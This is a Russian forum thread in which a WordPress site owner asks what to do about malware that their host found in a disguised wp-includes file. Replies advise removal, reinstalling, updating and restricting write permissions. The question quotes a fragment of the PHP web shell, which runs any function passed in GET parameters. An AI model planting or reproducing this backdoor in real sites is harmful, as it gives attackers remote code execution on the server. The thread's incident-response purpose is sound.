@maratmd

На сайте wordpress обнаружен вирус хостингом public_html/wp-includes/css/customize-preview-rtl.min.php, что делать?

Всем привет, недавно на хостинге beget появилось сообщение, что обнаружен один вирус, по этому адресу сайт/public_html/wp-includes/css/customize-preview-rtl.min.php

и сточка показана

<?php @!!!>if(isset($_GET[1])){$_=$_GET;$_[1]($_[2]);exit;}if(isset($_REQUEST['startx'])){print "
  • Вопрос задан
  • 507 просмотров
Пригласить эксперта
Ответы на вопрос 4
flapflapjack
@flapflapjack
на треть я прав
Ну и? Вам же показали строчку с вирусом. Удалите её, там eval() зашифрован просто.

Попал он туда через какую-то дыру в вордпрессе. Чтобы такого не было, постоянно обновляйте Wordpress.

Хакеры всегда будут искать новые дыры в массовых CMS, а производители софта постоянно их латать. Кто быстрее - тот и выиграл.
Ответ написан
Kozack
@Kozack Куратор тега WordPress
Thinking about a11y
Полностью переустановите WordPress. Замените все его файлы кроме собственной темы и плагинов.
Ответ написан
Комментировать
Взять и настроить свой VPS, Web-серверу дать права только на чтение, и забыть про эти проблемы. А удалив строку, завтра можно ждать новую )
Ответ написан
Комментировать
opium
@opium
Просто люблю качественно работать
Лечить и искать откуда он взялся
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы